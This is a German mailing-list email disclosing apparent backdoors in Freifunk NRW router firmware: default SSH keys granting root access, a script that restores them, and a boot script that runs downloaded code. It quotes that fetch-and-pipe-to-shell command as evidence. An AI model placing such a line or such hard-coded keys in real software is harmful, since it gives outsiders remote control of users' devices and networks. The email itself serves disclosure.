<div dir="ltr">Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste,<br>
<br>
da für mich in Frage kam bei einem Bekannten in Leverkusen einen 
"HotSpot" von euch aufzustellen habe ich mir eure Firmware zum Test 
selber Installiert.<br>
<br>
Die Firmware enthält von vorne herein mehrere ssh keys die vollen root 
Zugang zu den Geräten (und damit dem gesamten lokalen Netzwerk) 
ermöglichen, neben den privaten Schlüsseln von <a href="mailto:tobias@freifunk-nrw.de" target="_blank">tobias@freifunk-nrw.de</a> 
und kevinolbrich@Kevins-MacBook-Pro.local werden mutmaßlich auch die 
Schlüssel von Servern hinzugefügt: maintsb, maintrw1 und maintrw2. 
Siehe:<br>
<a href="https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default" target="_blank">https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default</a><br>
<br>
Werden diese Schlüssel gelöscht, stellt sie ein Skript beim booten wieder her.<br>
<br>
Zudem startet der Knoten per default, zumindest bei jedem Bootvorgang, 
beliebigen code, den er mit dem Skript /etc/freifunk/start.backdoor nach
 lädt:<br>
<br>
ff-curl boot/$(cat /proc/sys/kernel/hostname) | sh<br>
<br>
Derartig konfigurierte Knoten wurden auch in mindesten einem Parteibüro 
der Piraten aufgestellt. Es ist davon auszugehen, dass auch die andern 
Knoten im Feld, Beispielsweise im Rathaus in Wermelskirchen über 
derartiges verfügen:<br>
<a href="http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18" target="_blank">http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18</a><br>
<br>
Bei einer Durchsicht eures gits habe ich festgestellt, dass zumindest das Backdoor Modul inzwischen wieder entfernt wurde:<br>
<a href="https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3" target="_blank">https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3</a><br>
<br>
Allerdings vom selben User, der es im Juli 2014 implementiert hat:<br>
<a href="https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor" target="_blank">https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor</a><br>
<br>
Ich fordere den Vorstand des VfN auf die Angelegenheit zu klären und 
sofern sie strafrechtlich relevant ist gegen die entsprechenden 
Mitglieder Anzeige zu erstatten. Eine öffentliche Stellungnahme zur 
vergangenen Praxis und dem zukünftigen Vorgehen halte ich für zwingend 
notwendig!<br>
<br>
Vom Förderverein Freie Netzwerke e. V. wünsche ich mir eine klare 
Distanzierung von derartigem Verhalten. Ich persönlich empfinde es als 
unerträglich, dass ein Verein, der derartiges Verhalten von einem 
Vorstandsmitglied duldet, von euch als Freifunk anerkannt wird. 
Schlimmer, sich Freifunk NRW nennt und damit weitere Vereine in Verruf 
zieht.<br>
<br>
Viele Grüße<br>
Malte Möller</div>